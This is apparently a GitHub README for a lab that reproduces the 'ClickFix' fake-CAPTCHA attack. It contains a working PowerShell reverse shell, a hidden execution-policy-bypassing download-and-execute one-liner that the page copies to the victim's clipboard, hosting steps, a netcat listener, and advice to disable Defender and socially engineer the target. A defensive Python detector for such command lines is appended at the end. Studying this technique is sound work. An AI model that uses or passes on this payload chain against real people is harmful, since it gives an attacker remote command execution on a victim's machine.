Cyb3rMaddy/CAPTCHA-and-Reverse-Shell

CAPTCHA-and-Reverse-Shell

For this project, you will need a Linux VM and a Windows VM. I edited the script from John Hammond's ReCAPTCHA Phish.

On Twitter, this technique is called "ClickFix" or Emmenhtal; it has been used in LummaStealer campaigns observed by Unit42, Orange Cyberdefense, Huntress, and others.

Attack Vector: Copy and Paste

Prepare Your Files

You need two key files:

  1. index.html: Your CAPTCHA-like interface. (JH Github)
  2. reverse-shell.ps1: The PowerShell reverse shell script.

reverse-shell.ps1 File:

# PowerShell Reverse Shell Script
$client = New-Object System.Net.Sockets.TcpClient('<YOUR_VM_IP>', 4444);
$stream = $client.GetStream();
[byte[]]$buffer = 0..65535|%{0};
while(($i = $stream.Read($buffer, 0, $buffer.Length)) -ne 0) {
    $data = (New-Object Text.UTF8Encoding).GetString($buffer, 0, $i);
    $result = (iex $data 2>&1 | Out-String);
    $send = ([text.encoding]::UTF8).GetBytes($result);
    $stream.Write($send, 0, $send.Length);
}
$client.Close();

Edit index.html to launch reverse shell payload (JH Github)

powershell -NoP -NonI -W Hidden -Exec Bypass -Command "IEX(New-Object Net.WebClient).DownloadString('http://<YOUR_VM_IP>:8080/reverse-shell.ps1')";

3. Host Files Using Python’s Built-In HTTP Server

  1. Install Python (if not already installed):

    Most Linux distributions come with Python pre-installed. Check by running:

    python3 --version

    If not installed, you can install it using:

    sudo apt update
    sudo apt install python3

  2. Prepare Your Directory:

    Move to the directory where your index.html and reverse-shell.ps1 files are located.

    cd /path/to/your/files

  3. Start the Python HTTP Server:

    Use Python’s built-in HTTP server to host your files. By default, it listens on port 8000, but you can choose another port if needed.

    python3 -m http.server 8080

  4. Verify Hosting:

    Open a web browser and navigate to http://<YOUR_VM_IP>:8080. You should see your CAPTCHA-like page. The PowerShell script can be accessed at http://<YOUR_VM_IP>:8080/reverse-shell.ps1.

4. Testing

  1. Open Your Browser: Visit http://<YOUR_VM_IP>:8080 to see your hosted CAPTCHA page.

  2. Verify Access: Make sure that both the CAPTCHA page and the PowerShell script are accessible.

5. Set Up a Listener on Your Linux VM

To catch the reverse shell connection from the target machine, you need to set up a listener on your Linux VM. You can use Netcat (nc) for this purpose.

  1. Install Netcat (if not already installed):

    sudo apt update
    sudo apt install netcat

  2. Start the Netcat Listener:

    Open a terminal and start a Netcat listener on the port you specified in your reverse shell script (e.g., 4444). Make sure you replace <YOUR_VM_IP> in your PowerShell script with your actual VM IP.

    nc -lvnp 4444

    This command listens on port 4444 and will display any incoming connections.

6. Deploy the Payload (DISABLE DEFENDER)

To get the reverse shell to connect back to your machine, you need the target to run the PowerShell command that you copied to their clipboard. Here’s a breakdown:

  1. Ensure the Target Executes the Payload:

    When the target pastes and runs the command from their clipboard, it will download and execute the PowerShell script from your server. Ensure that you’ve communicated with the target in a way that gets them to execute this command. This might be done by social engineering or another method, but always remember that this should only be done in a legal context, such as a Capture The Flag (CTF) competition or with proper authorization.

  2. Verify the Connection:

    Once the target executes the payload, you should see a connection in your Netcat terminal. You can then interact with the reverse shell by typing commands directly into the Netcat session.
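
A defender's view of the launcher from the index.html step, as an added example that is not part of the original repository: it flags process command lines that combine the DownloadString/IEX cradle with a hidden window or an execution-policy bypass, resolving abbreviated switches such as -NoP and -W to their full names. The event records, PIDs, the 192.0.2.10 address, and all function names are constructed for illustration.

```python
import re

# Full names behind the abbreviated switches in the page's launcher
# (-NoP, -NonI, -W, -Exec), with the shortest prefix this example accepts.
PARAMS = {"noprofile": 3, "noninteractive": 4, "windowstyle": 1, "executionpolicy": 2}
SWITCH = re.compile(r"(?<!\S)-(\w+)(?:\s+(\w+))?")  # "-name" plus optional bare value

def indicators(cmdline):
    """Return the launcher traits present in one process command line."""
    low, found = cmdline.lower(), set()
    if "powershell" not in low and "pwsh" not in low:
        return found
    for name, value in SWITCH.findall(low):
        full = "executionpolicy" if name == "ep" else next(
            (p for p, n in PARAMS.items() if len(name) >= n and p.startswith(name)), None)
        if full == "windowstyle" and value == "hidden":
            found.add("hidden_window")
        elif full == "executionpolicy" and value in ("bypass", "unrestricted"):
            found.add("policy_bypass")
        elif full in ("noprofile", "noninteractive"):
            found.add(full)
    if "downloadstring" in low:
        found.add("download_cradle")
    if re.search(r"\b(iex|invoke-expression)\b", low):
        found.add("invoke_expression")
    return found

def is_clickfix_like(cmdline):
    """Flag download-and-execute combined with a hidden window or policy bypass."""
    hits = indicators(cmdline)
    return {"download_cradle", "invoke_expression"} <= hits and bool(
        hits & {"hidden_window", "policy_bypass"})

# Constructed process-creation records (pid, command line). 192.0.2.10 is a
# documentation address standing in for <YOUR_VM_IP>.
CRADLE = "(New-Object Net.WebClient).DownloadString('http://192.0.2.10:8080/reverse-shell.ps1')"
EVENTS = [
    (4120, f'powershell -NoP -NonI -W Hidden -Exec Bypass -Command "IEX{CRADLE}"'),
    (4388, "powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass "
           f'-Command "Invoke-Expression {CRADLE}"'),
    (5012, r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"),
    (5200, 'powershell -Command "Get-Process | Sort-Object CPU"'),
]

def triage(events):
    return [pid for pid, cmd in events if is_clickfix_like(cmd)]

if __name__ == "__main__":
    print(triage(EVENTS))  # [4120, 4388]
```

Feed it the command-line field from process-creation telemetry such as Sysmon Event ID 1 or Security event 4688 with command-line auditing enabled. The scheduled-script record (pid 5012) uses a policy bypass but is not flagged, because it has no download-and-execute cradle.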
